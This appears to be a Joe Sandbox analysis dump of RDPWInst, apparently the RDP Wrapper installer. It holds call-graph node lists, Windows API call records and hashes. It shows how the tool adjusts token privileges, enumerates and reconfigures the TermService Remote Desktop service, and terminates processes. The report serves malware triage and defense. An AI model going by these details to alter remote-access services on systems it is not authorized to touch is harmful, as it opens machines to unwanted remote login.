22594->22604 22595->22577 22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 
22664->22666 22667 407dec 14 API calls 22666->22667 22669 43c621 22667->22669 22668 43c6b4 22672 438860 17 API calls 22668->22672 22671 407450 15 API calls 22669->22671 22670 43c65d 22670->22668 22673 43c45c 17 API calls 22670->22673 22674 43c62b 22671->22674 22681 43c6f3 22672->22681 22675 43c68c 22673->22675 22676 404cdc 14 API calls 22674->22676 23551 407184 15 API calls 22675->23551 22678 43c630 22676->22678 22680 4042f8 14 API calls 22678->22680 22683 43c635 22680->22683 22681->22135 23550 40632c 10 API calls 22683->23550 23566 43ae28 22685->23566 22687 43e7e6 22688 43e7fa 22687->22688 22689 43b1a8 26 API calls 22687->22689 22690 43ae28 27 API calls 22688->22690 22689->22688 22691 43e804 22690->22691 22692 43e818 22691->22692 22693 43b1a8 26 API calls 22691->22693 22692->22144 22693->22692 22695 406bd8 22694->22695 22696 43bf27 GetCurrentProcess OpenProcessToken 22695->22696 22697 43bf97 22696->22697 22698 43bf4c GetLastError 22696->22698 22701 43bfa3 LookupPrivilegeValueW 22697->22701 23629 40f220 15 API calls 22698->23629 22700 43bf66 23630 407184 15 API calls 22700->23630 22703 43bffa AdjustTokenPrivileges 22701->22703 22704 43bfaf GetLastError 22701->22704 22707 43c031 GetLastError 22703->22707 22716 43bf92 22703->22716 23631 40f220 15 API calls 22704->23631 23633 40f220 15 API calls 22707->23633 22708 43bfc9 23632 407184 15 API calls 22708->23632 22713 43c04b 23634 407184 15 API calls 22713->23634 22716->22151 22732 43c216 TerminateProcess 22731->22732 22733 43c1da GetLastError 22731->22733 22734 43c222 CloseHandle GetLastError 22732->22734 22735 43c264 CloseHandle 22732->22735 22736 407450 15 API calls 22733->22736 22737 407450 15 API calls 22734->22737 22735->22153 22738 43c1f6 22736->22738 22739 43c244 22737->22739 22740 407dec 14 API calls 22738->22740 22741 407dec 14 API calls 22739->22741 22742 43c1fb 22740->22742 22744 43c249 22741->22744 22743 407450 15 API calls 22742->22743 22745 43c205 22743->22745 22746 407450 15 API calls 22744->22746 22747 
404cdc 14 API calls 22745->22747 22748 43c253 22746->22748 22749 43c20a 22747->22749 22750 404cdc 14 API calls 22748->22750 22752 4042f8 14 API calls 22749->22752 22751 43c258 22750->22751 22753 4042f8 14 API calls 22751->22753 22754 43c20f 22752->22754 22755 43c25d 22753->22755 23635 40632c 10 API calls 22754->23635 23636 40632c 10 API calls 22755->23636 22759 43b59e 22758->22759 22760 407450 15 API calls 22759->22760 22761 43b5c5 22760->22761 22762 407450 15 API calls 22761->22762 22763 43b5cd 22762->22763 22764 407450 15 API calls 22763->22764 22765 43b5d7 22764->22765 22766 404cdc 14 API calls 22765->22766 22767 43b5dc 22766->22767 22768 4042f8 14 API calls 22767->22768 22769 43b5e1 OpenSCManagerW 22768->22769 22770 43b5f8 GetLastError 22769->22770 22772 43b610 22769->22772 23637 43b48c 17 API calls 22770->23637 22773 43b61a OpenServiceW 22772->22773 22774 43b642 StartServiceW 22773->22774 22775 43b62d GetLastError 22773->22775 22777 43b6a6 CloseServiceHandle CloseServiceHandle 22774->22777 22778 43b65a GetLastError 22774->22778 23638 43b48c 17 API calls 22775->23638 22779 43b60a 22777->22779 22781 43b696 22778->22781 22782 43b669 Sleep StartServiceW 22778->22782 22779->22156 22780 43b63f 22780->22779 23640 43b48c 17 API calls 22781->23640 22782->22777 22783 43b686 22782->22783 23639 43b48c 17 API calls 22783->23639 22787 43e879 22786->22787 22788 43e88f 22786->22788 23649 4387ec 18 API calls 22787->23649 23650 4387a8 18 API calls 22788->23650 22791 43e88a 22792 438890 18 API calls 22791->22792 22793 43e8ab 22792->22793 22794 4389d8 19 API calls 22793->22794 22795 43e8ba 22794->22795 22796 43e8fa 22795->22796 22797 43e8be GetLastError 22795->22797 23641 4396b8 22796->23641 22799 407450 15 API calls 22797->22799 22801 43e8da 22799->22801 22802 407dec 14 API calls 22801->22802 22804 43e8df 22802->22804 22803 438860 17 API calls 22805 43e95b 22803->22805 22806 407450 15 API calls 22804->22806 22808 43ed53 22805->22808 22809 4389d8 19 API calls 22805->22809 22807 
43e8e9 22806->22807 22810 404cdc 14 API calls 22807->22810 22808->22166 22811 43e974 22809->22811 22812 43e8ee 22810->22812 22813 43e9b4 22811->22813 22814 43e978 GetLastError 22811->22814 22815 4042f8 14 API calls 22812->22815 22816 4396b8 70 API calls 22813->22816 22817 407450 15 API calls 22814->22817 22818 43e8f3 22815->22818 22819 43e9d1 22816->22819 22820 43e994 22817->22820 23651 40632c 10 API calls 22818->23651 22823 438860 17 API calls 22819->22823 22822 407dec 14 API calls 22820->22822 22824 43e999 22822->22824 22825 43ea10 22823->22825 22826 407450 15 API calls 22824->22826 22827 4389d8 19 API calls 22825->22827 22828 43e9a3 22826->22828 22830 43ea1f 22827->22830 22829 404cdc 14 API calls 22828->22829 22831 43e9a8 22829->22831 22832 43ea23 GetLastError 22830->22832 22833 43ea5f 22830->22833 22834 4042f8 14 API calls 22831->22834 22836 407450 15 API calls 22832->22836 22835 4396b8 70 API calls 22833->22835 22837 43e9ad 22834->22837 22838 43ea7c 22835->22838 22839 43ea3f 22836->22839 23652 40632c 10 API calls 22837->23652 22843 438860 17 API calls 22838->22843 22840 407dec 14 API calls 22839->22840 22842 43ea44 22840->22842 22844 407450 15 API calls 22842->22844 22845 43eabb 22843->22845 22846 43ea4e 22844->22846 23644 439d1c 22845->23644 22849 404cdc 14 API calls 22846->22849 22850 43ea53 22849->22850 22852 4042f8 14 API calls 22850->22852 22851 4389d8 19 API calls 22853 43eadf 22851->22853 22854 43ea58 22852->22854 22855 43eae3 GetLastError 22853->22855 22856 43eb1f 22853->22856 23653 40632c 10 API calls 22854->23653 22859 407450 15 API calls 22855->22859 22932 43f314 22931->22932 22933 43f31f 22931->22933 23673 43c31c 22932->23673 22935 43c31c 21 API calls 22933->22935 22937 43f329 22935->22937 22936 43f31e 22936->22174 22937->22174 22939 43cebb 22938->22939 22940 42f9fc 73 API calls 22939->22940 22941 43cee1 22940->22941 22941->21811 22942->21872 22943->21867 22944->21892 22945->21986 22946->22073 22947->22085 22948->21918 22949->21912 22951 405fd0 
22950->22951 22954 405f2c 22951->22954 22955 405f74 22954->22955 22956 405f3c 22954->22956 22955->22187 22956->22955 22958 4430dc 22956->22958 22959 4430f6 22958->22959 22960 44314c 22958->22960 22974 406098 22959->22974 22960->22956 22962 443122 22980 409610 22962->22980 22963 443100 22963->22962 22964 406bf0 15 API calls 22963->22964 22964->22962 22968 443136 22985 415b40 GetModuleHandleW 22968->22985 22971 408f6c 37 API calls 22972 443147 22971->22972 22990 415198 82 API calls 22972->22990 22976 4060a4 22974->22976 22979 4060d5 22976->22979 22991 405fe0 69 API calls 22976->22991 22992 406034 69 API calls 22976->22992 22993 406084 69 API calls 22976->22993 22979->22963 22981 4041b0 14 API calls 22980->22981 22982 40961d 22981->22982 22983 414698 GetVersionExW 22982->22983 22984 4146af 22983->22984 22984->22968 22986 415b61 22985->22986 22987 415b51 22985->22987 22986->22971 22994 40aa94 17 API calls 22987->22994 22989 415b5c 22989->22986 22990->22960 22991->22976 22992->22976 22993->22976 22994->22989 22996 406847 22995->22996 23006 404c3c 22996->23006 22998 406852 23018 4067c8 22998->23018 23001 406344 14 API calls 23002 406884 23001->23002 23003 4068c4 23002->23003 23004 4068d8 23003->23004 23005 4068ca SysFreeString 23003->23005 23004->22193 23005->23004 23007 404c3e 23006->23007 23010 404be8 23007->23010 23014 404c69 23007->23014 23028 404be8 23007->23028 23035 40a264 14 API calls 23007->23035 23008 404cb4 23008->22998 23010->23008 23015 404bfc 23010->23015 23026 404ba4 14 API calls 23010->23026 23012 404c33 23012->22998 23014->22998 23015->23012 23027 404318 14 API calls 23015->23027 23017 404c2e 23017->22998 23019 4067d4 23018->23019 23020 404c3c 14 API calls 23019->23020 23021 4067df 23020->23021 23022 404be8 14 API calls 23021->23022 23023 406816 23022->23023 23024 406344 14 API calls 23023->23024 23025 40681f 23024->23025 23025->23001 23026->23015 23027->23017 23029 404bf4 23028->23029 23032 404bfc 23028->23032 23036 404ba4 14 API calls 23029->23036 
23031 404c33 23031->23007 23032->23031 23037 404318 14 API calls 23032->23037 23034 404c2e 23034->23007 23035->23007 23036->23032 23037->23034 23041 4048dc 23038->23041 23042 4048e8 23041->23042 23043 40491d 23042->23043 23045 404318 14 API calls 23042->23045 23043->22201 23045->23043 23046->22205 23047->22208 23048->22204 23051 404450 23049->23051 23050 406f48 15 API calls 23052 4044b7 23050->23052 23051->23050 23052->22212 23054 407504 14 API calls 23053->23054 23055 406d3c 23054->23055 23056 406344 14 API calls 23055->23056 23057 40459a 23056->23057 23057->22222 23058->22227 23059->22232 23061 4388b7 23060->23061 23062 43889d 23060->23062 23066 438b0c 23061->23066 23063 4388a3 RegCloseKey 23062->23063 23064 4388ad 23062->23064 23063->23064 23065 438860 17 API calls 23064->23065 23065->23061 23067 438b36 23066->23067 23135 406c44 23066->23135 23131 43858c 23067->23131 23070 438b3e 23072 438b56 23070->23072 23139 4073dc 15 API calls 23070->23139 23073 438b84 RegOpenKeyExW 23072->23073 23074 438b93 23073->23074 23075 438b9c 23074->23075 23079 438bda 23074->23079 23076 438bc8 23075->23076 23140 407184 15 API calls 23075->23140 23141 4388bc 17 API calls 23076->23141 23080 438bfa RegOpenKeyExW 23079->23080 23081 438c09 23080->23081 23083 438c12 23081->23083 23087 438c4d 23081->23087 23082 438bd5 23082->22244 23084 438c3e 23083->23084 23142 407184 15 API calls 23083->23142 23143 4388bc 17 API calls 23084->23143 23088 438c6b RegOpenKeyExW 23087->23088 23089 438c7a 23088->23089 23089->23082 23090 438cac 23089->23090 23144 407184 15 API calls 23089->23144 23090->23082 23145 4388bc 17 API calls 23090->23145 23148 4392a0 23093->23148 23096 439422 23099 406d2c 14 API calls 23096->23099 23097 439478 23098 406bf0 15 API calls 23097->23098 23107 43946d 23098->23107 23100 439434 23099->23100 23151 4398f0 23100->23151 23102 43944c 23103 43946f 23102->23103 23105 439458 23102->23105 23159 438560 69 API calls 23103->23159 23106 406f48 15 API calls 23105->23106 23106->23107 23108 
438860 23107->23108 23109 43886a 23108->23109 23110 43888e 23108->23110 23111 438870 RegFlushKey 23109->23111 23112 438876 RegCloseKey 23109->23112 23114 40e50c 23110->23114 23111->23112 23113 406bf0 15 API calls 23112->23113 23113->23110 23115 40e518 23114->23115 23116 40e53b 23115->23116 23117 40e52c 23115->23117 23119 406f48 15 API calls 23116->23119 23166 40e4bc 15 API calls 23117->23166 23120 40e539 23119->23120 23120->22259 23121->22240 23122->22240 23124 407dc4 23123->23124 23167 404cb8 23124->23167 23127->22245 23128->22258 23129->22267 23130->22292 23132 43859c 23131->23132 23134 4385cd 23132->23134 23146 4064f4 15 API calls 23132->23146 23134->23070 23137 406c48 23135->23137 23136 406c78 23136->23067 23137->23136 23147 4041cc 14 API calls 23137->23147 23139->23072 23141->23082 23143->23082 23145->23082 23146->23134 23147->23136 23160 43924c 23148->23160 23150 4392b4 23150->23096 23150->23097 23152 406c7c 23151->23152 23153 439916 RegQueryValueExW 23152->23153 23155 439929 23153->23155 23154 439951 23154->23102 23155->23154 23164 413794 69 API calls 23155->23164 23157 43994c 23165 405c30 14 API calls 23157->23165 23159->23107 23161 439264 23160->23161 23162 439278 RegQueryValueExW 23161->23162 23163 43928b 23162->23163 23163->23150 23164->23157 23166->23120 23168 404c3c 14 API calls 23167->23168 23169 404ccc 23168->23169 23170 404be8 14 API calls 23169->23170 23171 404cd9 23170->23171 23171->22256 23172->22333 23174 43c47b 23173->23174 23175 406bf0 15 API calls 23174->23175 23176 43c492 23175->23176 23177 43c4dc 23176->23177 23194 415584 16 API calls 23176->23194 23180 43c4f0 ExpandEnvironmentStringsW 23177->23180 23179 43c4ce 23181 406c44 14 API calls 23179->23181 23182 43c4fa 23180->23182 23181->23177 23182->22336 23184 406c7c 23183->23184 23185 43dc79 LoadLibraryExW 23184->23185 23186 43dc85 FindResourceW 23185->23186 23187 43dcfc 23185->23187 23186->23187 23188 43dc95 LoadResource 23186->23188 23190 40fed8 23187->23190 23188->23187 23189 43dca0 
FreeLibrary 23188->23189 23189->23187 23195 40feec 23190->23195 23192 40fee7 23192->22341 23194->23179 23196 40fef5 23195->23196 23197 40ff49 23196->23197 23213 4064f4 15 API calls 23196->23213 23199 40ffa0 23197->23199 23200 40ff59 23197->23200 23203 40ff76 23199->23203 23215 4064f4 15 API calls 23199->23215 23200->23203 23214 4064f4 15 API calls 23200->23214 23204 41004b 23203->23204 23211 40ffd3 23203->23211 23205 406d2c 14 API calls 23204->23205 23209 410049 23205->23209 23206 41003e 23207 406f48 15 API calls 23206->23207 23207->23209 23208 406bf0 15 API calls 23208->23211 23209->23192 23210 406f48 15 API calls 23210->23211 23211->23206 23211->23208 23211->23210 23216 4064f4 15 API calls 23211->23216 23213->23197 23214->23203 23215->23203 23216->23211 23276 40819c 23217->23276 23221 43b1bc 23220->23221 23222 407450 15 API calls 23221->23222 23223 43b1d9 23222->23223 23224 407450 15 API calls 23223->23224 23225 43b1e1 23224->23225 23226 407450 15 API calls 23225->23226 23227 43b1eb 23226->23227 23228 404cdc 14 API calls 23227->23228 23229 43b1f0 23228->23229 23230 4042f8 14 API calls 23229->23230 23231 43b1f5 OpenSCManagerW 23230->23231 23232 43b243 23231->23232 23233 43b209 GetLastError 23231->23233 23235 43b24d OpenServiceW 23232->23235 23234 407450 15 API calls 23233->23234 23236 43b225 23234->23236 23237 43b297 ChangeServiceConfigW 23235->23237 23238 43b25a CloseServiceHandle GetLastError 23235->23238 23239 407dec 14 API calls 23236->23239 23240 43b2f7 CloseServiceHandle CloseServiceHandle 23237->23240 23241 43b2b4 CloseServiceHandle CloseServiceHandle GetLastError 23237->23241 23242 407450 15 API calls 23238->23242 23243 43b22a 23239->23243 23245 43b23e 23240->23245 23246 407450 15 API calls 23241->23246 23247 43b27c 23242->23247 23244 407450 15 API calls 23243->23244 23248 43b234 23244->23248 23245->22438 23249 43b2dc 23246->23249 23250 407dec 14 API calls 23247->23250 23251 404cdc 14 API calls 23248->23251 23252 407dec 14 API calls 23249->23252 23253 
43b281 23250->23253 23254 43b239 23251->23254 23255 43b2e1 23252->23255 23256 407450 15 API calls 23253->23256 23257 4042f8 14 API calls 23254->23257 23258 407450 15 API calls 23255->23258 23259 43b28b 23256->23259 23257->23245 23261 43b2eb 23258->23261 23260 404cdc 14 API calls 23259->23260 23262 43b290 23260->23262 23263 404cdc 14 API calls 23261->23263 23264 4042f8 14 API calls 23262->23264 23265 43b2f0 23263->23265 23266 43b295 23264->23266 23267 4042f8 14 API calls 23265->23267 23266->23245 23267->23266 23269 408346 23268->23269 23273 408378 23268->23273 23270 408370 23269->23270 23269->23273 23301 40789c 23269->23301 23326 4041cc 14 API calls 23270->23326 23273->22100 23274->22442 23277 4081bb 23276->23277 23281 4081d5 23276->23281 23278 4081c6 23277->23278 23295 4042a0 14 API calls 23277->23295 23296 408194 16 API calls 23278->23296 23283 40821e 23281->23283 23297 4042a0 14 API calls 23281->23297 23282 4081d0 23282->22438 23285 40822f 23283->23285 23298 4042a0 14 API calls 23283->23298 23287 408238 23285->23287 23288 40826d 23285->23288 23299 4041e4 14 API calls 23287->23299 23289 4041b0 14 API calls 23288->23289 23291 408277 23289->23291 23292 408268 23291->23292 23300 40817c 20 API calls 23291->23300 23292->23282 23294 40819c 20 API calls 23292->23294 23294->23292 23295->23278 23296->23282 23297->23283 23298->23285 23299->23292 23300->23292 23302 4078a5 23301->23302 23305 4078e2 23301->23305 23303 4078e7 23302->23303 23304 4078ba 23302->23304 23306 4078f8 23303->23306 23307 4078ee 23303->23307 23304->23305 23308 4078c2 23304->23308 23309 407904 23304->23309 23305->23270 23327 406368 14 API calls 23306->23327 23310 406344 14 API calls 23307->23310 23314 4078c6 23308->23314 23315 407938 23308->23315 23312 407915 23309->23312 23313 40790b 23309->23313 23310->23305 23328 4068dc SysFreeString 23312->23328 23316 4068c4 SysFreeString 23313->23316 23318 407947 23314->23318 23319 4078ca 23314->23319 23315->23305 23329 407884 14 API calls 23315->23329 23316->23305 
23318->23305 23322 40789c 16 API calls 23318->23322 23321 407965 23319->23321 23325 4078d2 23319->23325 23321->23305 23330 40784c 16 API calls 23321->23330 23322->23318 23324 408340 16 API calls 23324->23325 23325->23305 23325->23324 23326->23273 23327->23305 23328->23305 23329->23315 23330->23321 23415 40f8fc 23331->23415 23333 40f9eb 23421 40730c 23333->23421 23335 40f9fc 23336 40f7c4 23335->23336 23337 406c7c 23336->23337 23338 40f7ce GetFileAttributesW 23337->23338 23339 40f7d9 23338->23339 23339->22510 23339->22623 23341 40f7fd 23340->23341 23342 40f835 23341->23342 23443 4136c4 69 API calls 23341->23443 23433 414f3c 23342->23433 23346 40f825 23444 405c30 14 API calls 23346->23444 23347 406c44 14 API calls 23349 40f84b 23347->23349 23350 40f868 23349->23350 23445 4064f4 15 API calls 23349->23445 23352 40f876 23350->23352 23353 40f7c4 GetFileAttributesW 23350->23353 23354 40f886 23352->23354 23355 40f9d8 15 API calls 23352->23355 23353->23352 23358 40f9d8 15 API calls 23354->23358 23360 40f8c6 23354->23360 23356 40f895 23355->23356 23357 4072a4 15 API calls 23356->23357 23357->23354 23359 40f8b2 23358->23359 23361 40f7e8 71 API calls 23359->23361 23360->22531 23362 40f8ba 23361->23362 23362->23360 23440 40fb5c 23362->23440 23365 406bf0 23364->23365 23366 40716f 23364->23366 23365->23364 23367 4070b0 23365->23367 23369 406c00 23365->23369 23371 406c10 23365->23371 23367->23366 23370 406bf0 15 API calls 23367->23370 23374 4070c3 23367->23374 23368 406c40 23368->22540 23369->23371 23373 407504 14 API calls 23369->23373 23370->23374 23371->23368 23457 4041cc 14 API calls 23371->23457 23372 40710c 23372->23366 23378 407504 14 API calls 23372->23378 23373->23371 23377 4070ee 23374->23377 23458 406504 15 API calls 23374->23458 23377->23372 23459 406504 15 API calls 23377->23459 23380 407122 23378->23380 23382 40715a 23380->23382 23460 406368 14 API calls 23380->23460 23383 406bf0 15 API calls 23382->23383 23384 40716b 23383->23384 23384->22540 23386 406c7c 
23385->23386 23387 40f787 GetFileAttributesW 23386->23387 23388 40f792 23387->23388 23389 40f79a GetLastError 23387->23389 23388->22552 23390 40f7a6 23389->23390 23391 40f7bb 23389->23391 23390->23391 23392 40f7b0 23390->23392 23391->22552 23461 40f73c FindFirstFileW FindClose 23392->23461 23394 40f7b7 23394->23391 23396 43cc63 23395->23396 23462 42f9fc 23396->23462 23398 43cc91 23466 42f7b0 23398->23466 23400 43ccad 23401 407450 15 API calls 23400->23401 23402 43cd49 23401->23402 23403 407450 15 API calls 23402->23403 23404 43cd51 23403->23404 23405 407450 15 API calls 23404->23405 23406 43cd5b 23405->23406 23407 407450 15 API calls 23406->23407 23408 43cd63 23407->23408 23409 404cdc 14 API calls 23408->23409 23410 43cd68 23409->23410 23411 4042f8 14 API calls 23410->23411 23412 43cd6d 23411->23412 23412->22513 23413->22623 23414->22556 23416 40f912 23415->23416 23419 40f93d 23416->23419 23430 4064f4 15 API calls 23416->23430 23418 40f9b2 23418->23333 23419->23418 23420 4064f4 15 API calls 23419->23420 23420->23419 23422 407322 23421->23422 23424 40734d 23422->23424 23431 4064f4 15 API calls 23422->23431 23425 407395 23424->23425 23426 4073a8 23424->23426 23427 406d2c 14 API calls 23425->23427 23432 406d1c 15 API calls 23426->23432 23429 4073a6 23427->23429 23429->23335 23430->23419 23431->23424 23432->23429 23434 406bf0 15 API calls 23433->23434 23435 414f4c 23434->23435 23446 414e7c 23435->23446 23437 414f66 23438 40f840 23437->23438 23439 406f48 15 API calls 23437->23439 23438->23347 23439->23438 23441 406c7c 23440->23441 23442 40fb68 CreateDirectoryW 23441->23442 23442->23360 23443->23346 23445->23350 23447 414e8e 23446->23447 23450 414ebd 23447->23450 23454 4064f4 15 API calls 23447->23454 23448 414ef0 23453 414f0b 23448->23453 23456 414728 15 API calls 23448->23456 23450->23448 23455 4064f4 15 API calls 23450->23455 23453->23437 23454->23450 23455->23448 23456->23453 23457->23368 23458->23377 23459->23372 23460->23382 23461->23394 23463 42fa06 23462->23463 

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                                                • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                                                • API String ID: 2770857348-2470772499
                                                                                • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                                                • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                                                • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                                                • API String ID: 48634454-398082305
                                                                                • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                                                • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                                                • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                                                • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                                                • API String ID: 1401577899-1200187420
                                                                                • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                                                • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                                                • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
